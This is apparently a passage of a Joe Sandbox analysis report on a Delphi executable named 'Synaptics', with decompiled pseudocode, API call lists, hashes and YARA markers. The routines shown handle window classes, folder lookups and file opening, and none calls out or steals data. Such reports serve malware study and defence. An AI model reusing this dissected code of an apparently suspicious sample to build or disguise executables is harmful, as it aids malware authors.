                                                                                                                                                                                                                            				_t80 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            				 *_t80 = _t49;
                                                                                                                                                                                                                            				_t50 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            				E0045AD24( *_t50, 1);
                                                                                                                                                                                                                            				_t53 =  *0x435da8; // 0x435dac
                                                                                                                                                                                                                            				E0041A634(_t53, 0x43807c, 0x43808c);
                                                                                                                                                                                                                            				_t63 = GetModuleHandleA("USER32");
                                                                                                                                                                                                                            				if(_t63 != 0) {
                                                                                                                                                                                                                            					 *0x49bc1c = GetProcAddress(_t63, "AnimateWindow");
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t83);
                                                                                                                                                                                                                            				 *[fs:eax] = _t83;
                                                                                                                                                                                                                            				_push(0x4464af);
                                                                                                                                                                                                                            				E004049C0( &_v20);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}


























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 00446384
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                                                                                                                                                                                            • RegisterClipboardFormatA.USER32 ref: 004463EB
                                                                                                                                                                                                                              • Part of subcall function 0041AF14: RtlInitializeCriticalSection.KERNEL32(00418638,?,?,00422E79,00000000,00422E9D), ref: 0041AF33
                                                                                                                                                                                                                              • Part of subcall function 00445F34: SetErrorMode.KERNEL32(00008000), ref: 00445F4D
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetModuleHandleA.KERNEL32(USER32,00000000,0044609A,?,00008000), ref: 00445F71
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00445F7E
                                                                                                                                                                                                                              • Part of subcall function 00445F34: LoadLibraryA.KERNEL32(imm32.dll,00000000,0044609A,?,00008000), ref: 00445F9A
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00445FBC
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00445FD1
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00445FE6
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00445FFB
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00446010
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00446025
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044603A
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044604F
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00446064
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00446079
                                                                                                                                                                                                                              • Part of subcall function 00445F34: SetErrorMode.KERNEL32(?,004460A1,00008000), ref: 00446094
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: GetKeyboardLayout.USER32(00000000), ref: 0045800D
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: 73C9AC50.USER32(00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00458062
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: 73C9AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0045806C
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: 73C9B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000), ref: 00458077
                                                                                                                                                                                                                              • Part of subcall function 004590AC: LoadIconA.USER32(00400000,MAINICON), ref: 00459191
                                                                                                                                                                                                                              • Part of subcall function 004590AC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                                                                                                                                                                                              • Part of subcall function 004590AC: OemToCharA.USER32(?,?), ref: 004591D6
                                                                                                                                                                                                                              • Part of subcall function 004590AC: CharLowerA.USER32(?,?,?,00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000), ref: 00459216
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                                                                                                                                                                                                            • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32$h}C
                                                                                                                                                                                                                            • API String ID: 2159221912-974380857
                                                                                                                                                                                                                            • Opcode ID: f4054742221fa1dac02399adf8f82c416533d39d02c8191dbacb8c2073790023
                                                                                                                                                                                                                            • Instruction ID: 9417c5a7fe2a4a4aad457f7fc52310e9237dc336e75d7247441188c808a0813e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4054742221fa1dac02399adf8f82c416533d39d02c8191dbacb8c2073790023
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E4103B09042049BDB00EFB6EC45A5E77B5AF59308B11853BF505E73A2DB39B904CB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%


                                                                                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                                                                                            			E004730FC(signed int __eax, void* __ebx, int __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v273;
                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                            				char _v296;
                                                                                                                                                                                                                            				char _v300;
                                                                                                                                                                                                                            				char _v304;
                                                                                                                                                                                                                            				char _v308;
                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                            				intOrPtr* _t81;
                                                                                                                                                                                                                            				signed int _t84;
                                                                                                                                                                                                                            				int _t91;
                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                            				intOrPtr _t100;
                                                                                                                                                                                                                            				intOrPtr* _t108;
                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                            				intOrPtr _t112;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t91 = __edx;
                                                                                                                                                                                                                            				_t29 = __eax;
                                                                                                                                                                                                                            				_t110 = _t111;
                                                                                                                                                                                                                            				_t112 = _t111 + 0xfffffed0;
                                                                                                                                                                                                                            				_v308 = 0;
                                                                                                                                                                                                                            				_v304 = 0;
                                                                                                                                                                                                                            				_v300 = 0;
                                                                                                                                                                                                                            				_v280 = 0;
                                                                                                                                                                                                                            				_t81 = __edx;
                                                                                                                                                                                                                            				_push(_t110);
                                                                                                                                                                                                                            				_push(0x473306);
                                                                                                                                                                                                                            				_push( *[fs:ecx]);
                                                                                                                                                                                                                            				 *[fs:ecx] = _t112;
                                                                                                                                                                                                                            				_t84 = __eax;
                                                                                                                                                                                                                            				if(__eax > 6) {
                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                            					if(_t29 != 7) {
                                                                                                                                                                                                                            						_t23 =  &_v8; // 0x476337
                                                                                                                                                                                                                            						SHGetSpecialFolderLocation(0, _t91, _t23); // executed
                                                                                                                                                                                                                            						_t25 =  &_v8; // 0x476337
                                                                                                                                                                                                                            						SHGetPathFromIDList( *_t25,  &_v273); // executed
                                                                                                                                                                                                                            						E0040A174( &_v273, _t81);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(_t110);
                                                                                                                                                                                                                            						_push(0x4732a8);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t112;
                                                                                                                                                                                                                            						E00472EF0( &_v280, _t81, _t84, 0);
                                                                                                                                                                                                                            						E00404DCC(_v280, 0x47331c);
                                                                                                                                                                                                                            						if(0 == 0) {
                                                                                                                                                                                                                            							_t13 =  &_v8; // 0x476337
                                                                                                                                                                                                                            							SHGetSpecialFolderLocation(0, 5, _t13);
                                                                                                                                                                                                                            							_t15 =  &_v8; // 0x476337
                                                                                                                                                                                                                            							SHGetPathFromIDList( *_t15,  &_v273);
                                                                                                                                                                                                                            							E0040A174( &_v273,  &_v300);
                                                                                                                                                                                                                            							E00409D30(_v300, _t81);
                                                                                                                                                                                                                            							E00404CCC( &_v304, "\\Downloads",  *_t81);
                                                                                                                                                                                                                            							_t59 = E00409A58(_v304);
                                                                                                                                                                                                                            							__eflags = _t59;
                                                                                                                                                                                                                            							if(_t59 == 0) {
                                                                                                                                                                                                                            								E00404CCC( &_v308, 0x473390,  *_t81);
                                                                                                                                                                                                                            								_t63 = E00409A58(_v308);
                                                                                                                                                                                                                            								__eflags = _t63;
                                                                                                                                                                                                                            								if(_t63 == 0) {
                                                                                                                                                                                                                            									E004049C0(_t81);
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									E00404C88(_t81, 0x473390);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E00404C88(_t81, "\\Downloads");
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t108 = GetProcAddress(LoadLibraryA("shell32.dll"), "SHGetKnownFolderPath");
                                                                                                                                                                                                                            							E00408CA8("{374DE290-123F-4565-9164-39C4925E467B}", _t81,  &_v296, _t108, 0);
                                                                                                                                                                                                                            							 *_t108( &_v296, 0, 0,  &_v12); // executed
                                                                                                                                                                                                                            							E00404BE8(_t81, _v12);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_pop(_t100);
                                                                                                                                                                                                                            						 *[fs:eax] = _t100;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t93);
                                                                                                                                                                                                                            					 *[fs:eax] = _t93;
                                                                                                                                                                                                                            					_push(E0047330D);
                                                                                                                                                                                                                            					E004049E4( &_v308, 3);
                                                                                                                                                                                                                            					return E004049C0( &_v280);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				switch( *((intOrPtr*)(__eax * 4 +  &M00473140))) {
                                                                                                                                                                                                                            					case 0:
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					case 1:
                                                                                                                                                                                                                            						_t91 = 0x1a;
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					case 2:
                                                                                                                                                                                                                            						__edx = 0x1c;
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					case 3:
                                                                                                                                                                                                                            						__edx = 0x23;
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					case 4:
                                                                                                                                                                                                                            						__edx = 0x2e;
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					case 5:
                                                                                                                                                                                                                            						__edx = 5;
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					case 6:
                                                                                                                                                                                                                            						__edx = 0;
                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                            0x004731f4
                                                                                                                                                                                                                            0x004732a0
                                                                                                                                                                                                                            0x004732a3
                                                                                                                                                                                                                            0x004732a3
                                                                                                                                                                                                                            0x004732df
                                                                                                                                                                                                                            0x004732e2
                                                                                                                                                                                                                            0x004732e5
                                                                                                                                                                                                                            0x004732f5
                                                                                                                                                                                                                            0x00473305
                                                                                                                                                                                                                            0x00473305
                                                                                                                                                                                                                            0x00473139
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0047315c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00473163
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0047316a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00473171
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00473178
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0047317f
                                                                                                                                                                                                                            0x0047317f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,00000000,004732A8,?,00000000,00473306,?,?,00476294,00000001,?,00476337), ref: 004731BA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 004731C7
                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000005,7cG,00000000,004732A8,?,00000000,00473306,?,?,00476294,00000001,?,00476337), ref: 00473206
                                                                                                                                                                                                                            • SHGetPathFromIDList.SHELL32(7cG,?), ref: 00473216
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFolderFromLibraryListLoadLocationPathProcSpecial
                                                                                                                                                                                                                            • String ID: 7cG$SHGetKnownFolderPath$\Downloads$shell32.dll${374DE290-123F-4565-9164-39C4925E467B}
                                                                                                                                                                                                                            • API String ID: 2341558874-1217846894
                                                                                                                                                                                                                            • Opcode ID: 7adf5945205450d3ce6c7d6fe9dd1f0e15b7de5a75cfa9d525413354a73d1a74
                                                                                                                                                                                                                            • Instruction ID: 6a38066a99e998b0feb9dfcd70d0f28be743192f9ebabe66a089855190f33de3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7adf5945205450d3ce6c7d6fe9dd1f0e15b7de5a75cfa9d525413354a73d1a74
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9741C970B04118ABD720EF65DC42BDE73B9EB48705F5084BBB90CA7681DA3C9F419A1E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 300 43e6bc-43e6f3 302 43e6f5-43e6fc 300->302 303 43e768-43e78d GetClassInfoA 300->303 302->303 306 43e6fe-43e703 302->306 304 43e78f-43e79a 303->304 305 43e79c-43e79e 303->305 304->305 307 43e7cd-43e7ea call 43e88c 304->307 308 43e7a0-43e7a8 UnregisterClassA 305->308 309 43e7ad-43e7c6 RegisterClassA 305->309 310 43e705-43e709 306->310 311 43e728-43e763 call 406a70 call 40d180 call 404378 306->311 320 43e7f1-43e804 GetWindowLongA 307->320 321 43e7ec call 40e79c 307->321 308->309 309->307 313 43e7c8 call 40e79c 309->313 310->311 312 43e70b-43e71a call 403d78 310->312 311->303 312->311 323 43e71c-43e726 call 441704 312->323 313->307 325 43e827-43e84e call 40a1d4 call 441a14 call 424e24 call 43c130 320->325 326 43e806-43e816 GetWindowLongA 320->326 321->320 323->303 339 43e853-43e857 325->339 326->325 331 43e818-43e822 SetWindowLongA 326->331 331->325 340 43e864-43e87c call 4049c0 339->340 341 43e859-43e85f call 403de8 339->341 341->340
                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E0043E6BC(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                            				struct _WNDCLASSA _v108;
                                                                                                                                                                                                                            				intOrPtr _v116;
                                                                                                                                                                                                                            				signed char _v137;
                                                                                                                                                                                                                            				void* _v144;
                                                                                                                                                                                                                            				struct _WNDCLASSA _v184;
                                                                                                                                                                                                                            				char _v188;
                                                                                                                                                                                                                            				char _v192;
                                                                                                                                                                                                                            				char _v196;
                                                                                                                                                                                                                            				int _t52;
                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                                                                            				intOrPtr _t104;
                                                                                                                                                                                                                            				intOrPtr _t108;
                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                            				intOrPtr* _t111;
                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t109 = __edi;
                                                                                                                                                                                                                            				_t94 = __ebx;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_v196 = 0;
                                                                                                                                                                                                                            				_t111 = __eax;
                                                                                                                                                                                                                            				_push(_t115);
                                                                                                                                                                                                                            				_push(0x43e87d);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t115 + 0xffffff40;
                                                                                                                                                                                                                            				_t95 =  *__eax;
                                                                                                                                                                                                                            				 *((intOrPtr*)( *__eax + 0x98))();
                                                                                                                                                                                                                            				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
                                                                                                                                                                                                                            					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                            					_t53 = _t52 + 1;
                                                                                                                                                                                                                            					if(_t53 == 0 || E00437D70 != _v184.lpfnWndProc) {
                                                                                                                                                                                                                            						if(_t53 != 0) {
                                                                                                                                                                                                                            							UnregisterClassA( &_v68, _v108.hInstance);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_v108.lpfnWndProc = E00437D70;
                                                                                                                                                                                                                            						_v108.lpszClassName =  &_v68;
                                                                                                                                                                                                                            						if(RegisterClassA( &_v108) == 0) {
                                                                                                                                                                                                                            							E0040E79C(_t94, _t95, _t109, _t111);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *0x49bc20 = _t111;
                                                                                                                                                                                                                            					_t96 =  *_t111; // executed
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t111 + 0x9c))();
                                                                                                                                                                                                                            					if( *(_t111 + 0x180) == 0) {
                                                                                                                                                                                                                            						E0040E79C(_t94, _t96, _t109, _t111);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
                                                                                                                                                                                                                            						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0040A1D4( *((intOrPtr*)(_t111 + 0x64)));
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t111 + 0x64)) = 0;
                                                                                                                                                                                                                            					E00441A14(_t111);
                                                                                                                                                                                                                            					E0043C130(_t111, E00424E24( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1); // executed
                                                                                                                                                                                                                            					_t130 =  *((char*)(_t111 + 0x5c));
                                                                                                                                                                                                                            					if( *((char*)(_t111 + 0x5c)) != 0) {
                                                                                                                                                                                                                            						E00403DE8(_t111, _t130);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t104);
                                                                                                                                                                                                                            					 *[fs:eax] = _t104;
                                                                                                                                                                                                                            					_push(0x43e884);
                                                                                                                                                                                                                            					return E004049C0( &_v196);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t94 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                                                            					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                            						_v192 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                                            						_v188 = 0xb;
                                                                                                                                                                                                                            						_t86 =  *0x49dc4c; // 0x422f30
                                                                                                                                                                                                                            						E00406A70(_t86,  &_v196);
                                                                                                                                                                                                                            						_t95 = _v196;
                                                                                                                                                                                                                            						E0040D180(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t108 =  *0x437498; // 0x4374e4
                                                                                                                                                                                                                            						if(E00403D78(_t94, _t108) == 0) {
                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_v116 = E00441704(_t94);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClassLongWindow$InfoRegisterUnregister
                                                                                                                                                                                                                            • String ID: 0/B$@$tC
                                                                                                                                                                                                                            • API String ID: 717780171-775952512
                                                                                                                                                                                                                            • Opcode ID: 0d6b4dee4e762a5f6d3e19aac8b5c99147156016fa7a3516e62b2d273b948d0a
                                                                                                                                                                                                                            • Instruction ID: ef2cd423dbe362dacdbee8c2275ea56bb610ff0c2a9daaab76c1ee9f024234ac
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d6b4dee4e762a5f6d3e19aac8b5c99147156016fa7a3516e62b2d273b948d0a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90518E70A013549BEB20EB6ACC41B9A77F9AF09308F10457EE845E73D2DB38AD45CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                                                                            			E00402D70(void** __eax) {
                                                                                                                                                                                                                            				long _t29;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				long _t34;
                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                            				long _t54;
                                                                                                                                                                                                                            				long _t55;
                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                            				void** _t59;
                                                                                                                                                                                                                            				DWORD* _t60;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t59 = __eax;
                                                                                                                                                                                                                            				 *((intOrPtr*)(__eax + 0xc)) = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)(__eax + 0x10)) = 0;
                                                                                                                                                                                                                            				if(0xffffffffffff284f == 0) {
                                                                                                                                                                                                                            					_t29 = 0x80000000;
                                                                                                                                                                                                                            					_t55 = 1;
                                                                                                                                                                                                                            					_t54 = 3;
                                                                                                                                                                                                                            					 *((intOrPtr*)(__eax + 0x1c)) = 0x402cc4;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(0xffffffffffff284f == 0) {
                                                                                                                                                                                                                            						_t29 = 0x40000000;
                                                                                                                                                                                                                            						_t55 = 1;
                                                                                                                                                                                                                            						_t54 = 2;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						if(0xffffffffffff284f != 0) {
                                                                                                                                                                                                                            							return 0xffffffffffff284d;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t29 = 0xc0000000;
                                                                                                                                                                                                                            						_t55 = 1;
                                                                                                                                                                                                                            						_t54 = 3;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t59[7] = E00402D04;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t59[9] = E00402D50;
                                                                                                                                                                                                                            				_t59[8] = E00402D00;
                                                                                                                                                                                                                            				if(_t59[0x12] == 0) {
                                                                                                                                                                                                                            					_t59[2] = 0x80;
                                                                                                                                                                                                                            					_t59[9] = E00402D00;
                                                                                                                                                                                                                            					_t59[5] =  &(_t59[0x53]);
                                                                                                                                                                                                                            					if(_t59[1] == 0xd7b2) {
                                                                                                                                                                                                                            						if(_t59 != 0x49e3e8) {
                                                                                                                                                                                                                            							_t31 = GetStdHandle(0xfffffff5);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t31 = GetStdHandle(0xfffffff4);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t31 = GetStdHandle(0xfffffff6);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t31 == 0xffffffff) {
                                                                                                                                                                                                                            						goto L37;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *_t59 = _t31;
                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0); // executed
                                                                                                                                                                                                                            					if(_t38 == 0xffffffff) {
                                                                                                                                                                                                                            						L37:
                                                                                                                                                                                                                            						_t59[1] = 0xd7b0;
                                                                                                                                                                                                                            						return GetLastError();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *_t59 = _t38;
                                                                                                                                                                                                                            					if(_t59[1] != 0xd7b3) {
                                                                                                                                                                                                                            						L30:
                                                                                                                                                                                                                            						if(_t59[1] == 0xd7b1) {
                                                                                                                                                                                                                            							L34:
                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t34 = GetFileType( *_t59);
                                                                                                                                                                                                                            						if(_t34 == 0) {
                                                                                                                                                                                                                            							CloseHandle( *_t59);
                                                                                                                                                                                                                            							_t59[1] = 0xd7b0;
                                                                                                                                                                                                                            							return 0x69;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t34 == 2) {
                                                                                                                                                                                                                            							_t59[8] = E00402D04;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L34;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t59[1] = _t59[1] - 1;
                                                                                                                                                                                                                            					_t40 = GetFileSize( *_t59, 0) + 1;
                                                                                                                                                                                                                            					if(_t40 == 0) {
                                                                                                                                                                                                                            						goto L37;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t41 = _t40 - 0x81;
                                                                                                                                                                                                                            					if(_t41 < 0) {
                                                                                                                                                                                                                            						_t41 = 0;
                                                                                                                                                                                                                            					}
